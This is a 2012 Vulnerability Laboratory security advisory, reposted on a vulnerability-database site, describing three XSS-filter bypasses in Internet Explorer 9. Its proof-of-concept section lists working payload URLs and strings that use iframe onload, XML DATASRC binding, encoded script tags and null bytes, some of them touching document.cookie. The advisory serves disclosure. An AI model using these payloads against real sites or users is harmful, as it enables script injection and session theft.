Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Internet Explorer 9.10 - XSS Protection Filter Vulnerabilities

🗓️ 19 Oct 2012 00:00:00Reported by Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ([email protected])Type 
vulnerlab
 vulnerlab🔗 www.vulnerability-lab.com👁 15 Views

Internet Explorer 9.10 XSS Protection Filter Bypass Vulnerabilities in Microsof

Code
Document Title:
===============
Internet Explorer 9.10 - XSS Protection Filter Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=729


Release Date:
=============
2012-10-19


Vulnerability Laboratory ID (VL-ID):
====================================
729


Common Vulnerability Scoring System:
====================================
6.4


Product & Service Introduction:
===============================
Windows Internet Explorer 9 (IE9) is a version of the Internet Explorer web browser from Microsoft. It was released to the public on 
March 14, 2011. Microsoft has released Internet Explorer 9 as a major out-of-band version that is not tied to the release schedule of 
any particular version of Windows, unlike previous versions. It is the first version since Internet Explorer 2 to not be bundled with 
a Windows operating system, although some OEMs have preinstalled it with Windows 7 on their PCs, as well as new Windows 7 laptops.

The system requirements for Internet Explorer 9 are Windows 7, Windows Server 2008 R2, Windows Vista Service Pack 2 or Windows Server 
2008 SP2 with the Platform Update. Windows XP and earlier are not supported. Internet Explorer 9 is the last version of Internet Explorer 
to be supported on Windows Vista; Internet Explorer 10 will only be supported on Windows 7 and later (up to Platform Preview 2), but 
Platform Preview 3 and above works only with Windows 8. Both IA-32 and x64 builds are available.

Internet Explorer 9 supports several CSS 3 properties, embedded ICC v2 or v4 color profiles support via Windows Color System, and has 
improved JavaScript performance. It is the last of the five major web browsers to implement support for Scalable Vector Graphics (SVG). 
It also features hardware-accelerated graphics rendering using Direct2D, hardware-accelerated text rendering using DirectWrite, 
hardware-accelerated video rendering using Media Foundation, imaging support provided by Windows Imaging Component, and high fidelity 
printing powered by the XML Paper Specification (XPS) print pipeline. Internet Explorer 9 also supports the HTML5 video and audio tags 
and the Web Open Font Format.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Internet_Explorer_9 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple XSS Protection Filter Bypass Vulnerabilities in Microsoft Internet Explorer v9.10.


Vulnerability Disclosure Timeline:
==================================
2012-10-21:	Public Disclosure


Discovery Status:
=================
Published


Affected Product(s):
====================
Microsoft Corp.
Product: Internet Explorer (Web Browser) 9.0.10 (KB2744842)


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
1.1 - Shift 1 Position to Bypass
A xss protection filter bypass vulnerability is detected in the Microsofts official Internet Explorer v9.0.8112.16421 Web Browser.
The vulnerability allows an remote attacker to bypass the xss protection mechanism of the internet explorer v9.x web browser to 
execute client-side or server-side script codes.

The second xss protection filter bypass vulnerability is located in a shift 1 Position misconfiguration in the filter which leads 
to a bypass. Remote Attackers can insert multiple frame and onload alert strings in a get request to shift the position (replace) 
of the parse in the tag itself. The potential attacker can shift the position of the parsed tag when refreshing by one position since 
the parsed content is outside of the requested script code context. Remote attackers can bypass the xss filter parse and replace 
function of the internet explorer 9 to perform xss requests on client- & server-side.

Successful exploitation of the web browser vulnerability results in (client- or server-side) cross site scripting and unauthorized 
script code execution via protection filter bypass.

Vulnerable Module(s):
				[+] XSS & Script Code Protection Filter

Vulnerable Function(s):
				[+] Shift 1 Position - Parse Function



1.2 Strings to Bypass - (Random)
A xss protection filter bypass vulnerability is detected in the Microsofts official Internet Explorer v9.0.8112.16421 Web Browser.
The vulnerability allows an remote attacker to bypass the xss protection mechanism of the internet explorer v9.x web browser to 
execute client-side or server-side script codes.

After some research around the filter function, we located some nice strings to bypass the xss protection filter of the internet 
explorer v9.x brower. The not recognized detected strings were performed with the datasrc class, xml tags or a requesting java-script 
with div tag and bound link. Remote attackers can bypass the xss filter parse and replace function of the internet explorer 9 to perform 
xss requests on client- & server-side.

Successful exploitation of the web browser vulnerability results in (client- or server-side) cross site scripting and unauthorized 
script code execution via protection filter bypass.

Vulnerable Module(s):
				[+] XSS & Script Code Protection Filter

Vulnerable String(s):
				[+] XML
				[+] DATASRC
				[+] js>div<a href<js


1.3 - NullByte to Bypass
A xss protection filter bypass vulnerability is detected in the Microsofts official Internet Explorer v9.0.8112.16421 Web Browser.
The vulnerability allows an remote attacker to bypass the xss protection mechanism of the internet explorer v9.x web browser to 
execute client-side or server-side script codes.

The first xss protection filter bypass vulnerability is located in the stripping tags function of the browser when processing 
nullbytes[NULL|%00] next to blocked xss script code & tags. Remote attackers can bypass the xss filter parse and replace function 
of the internet explorer 9 to perform xss requests on client- & server-side.

Successful exploitation of the web browser vulnerability results in (client- or server-side) cross site scripting and unauthorized 
script code execution via protection filter bypass.

Vulnerable Module(s):
				[+] XSS & Script Code Protection Filter
Vulnerable Function(s):
				[+] stripping tags function

Note: The vulnerability has already been public disclosed by a friend (Jean Pascal Pereira) - http://seclists.org/bugtraq/2012/Oct/100


Proof of Concept (PoC):
=======================
1.1 - Shift 1 Position to Bypass
The remote filter bypass vulnerability can be exploited by remote attacker with required user inter action click.
For demonstration or reproduce ...

URL:
http://vl.com/ie9/test.php?bkm=[JAVASCRIPT]]<div<a href="><iframe src=a onload=alert("VL") <http://google.de>]style="width: expression(document.cookie=true;);">

String: "><iframe src=a onload=alert("VL") <http://google.de>]style="width: expression(document.cookie=true;);">

--- Filter Results & Check Error Log---
/"> 
Warning: include() [function.include]: Failed opening '<div<a href="><iframe src=a onload=alert("VL") <http://google.de>]style="width: expression(document.cookie=true;);">' for inclusion ...

Credit: Benjamin Kunz Mejri ([email protected])


1.2 Strings to Bypass - (Random)
The remote filter bypass vulnerability can be exploited by remote attacker with required user inter action click.
For demonstration or reproduce ...

URL:
http://vl.com/ie9/test.php?bkm=¼script¾alert(¢XSS¢)¼/script¾

Strings: Works!
¼script¾alert(¢XSS¢)¼/script¾

--- Filter Results & Check Error Log---
Warning: include(¼script¾alert(¢XSS¢)¼/script¾) [function.include]: failed to open stream: No such file or directory 
in /home/xxx/test.php on line 8

Warning: include() [function.include]: Failed opening '¼script¾alert(¢XSS¢)¼/script¾' for inclusion 
(include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxx/test.php on line 8



URL:
http://vl.com/ie9/test.php?bkm=<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(document.cookie);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

Strings: Works!
>"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
>"<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]>  [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
<div<a href=http://google.de>]style="width: expression(document.cookie=true;);">


--- Filter Results & Check Error Log---
]]> 
Warning: include(<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert(document.cookie);\">]]></C></X></xml><SPAN DATASRC=) 
[function.include]: failed to open stream: No such file or directory in /home/xxx/test.php on line 8

Warning: include() [function.include]: Failed opening '<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert(document.cookie);\">]]>
</C></X></xml><SPAN DATASRC=' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxx/test.php on line 8

]] 
Warning: include(<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]<![CDATA[cript:document.cookie=true;\">]]</C></X></xml><SPAN DATASRC=) [function.include]: 
failed to open stream: No such file or directory in /home/u145021161/public_html/chrome/secure.php on line 8

Warning: include() [function.include]: Failed opening '<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]<![CDATA[cript:document.cookie=true;\">]]</C>
</X></xml><SPAN DATASRC=' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxx/test.php on line 8

Credit: Benjamin Kunz Mejri ([email protected])


1.3 - NullByte to Bypass
The remote filter bypass vulnerability can be exploited by remote attacker with required user inter action click.
For demonstration or reproduce ...

http://localhost:1337/ieb/blah.php?a=<s%00cript>alert(1)</s%00cript>
<a href='http://localhost:1337/ieb/blah.php?a=<s[NULL]cript>alert(1)</s[NULL]cript>'>Clickme</a>

Credit: Jean Pascal Pereira ([email protected])


Security Risk:
==============
The security risk of the 3 xss protection filter bypass vulnerabilities are as high(-). 


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ([email protected])


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    [email protected] 	- [email protected] 	       - [email protected]
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Oct 2012 00:00Current
7.4High risk
Vulners AI Score7.4
internet explorerxss protectionvulnerabilitybypassremotemicrosoftweb browserscript codes
15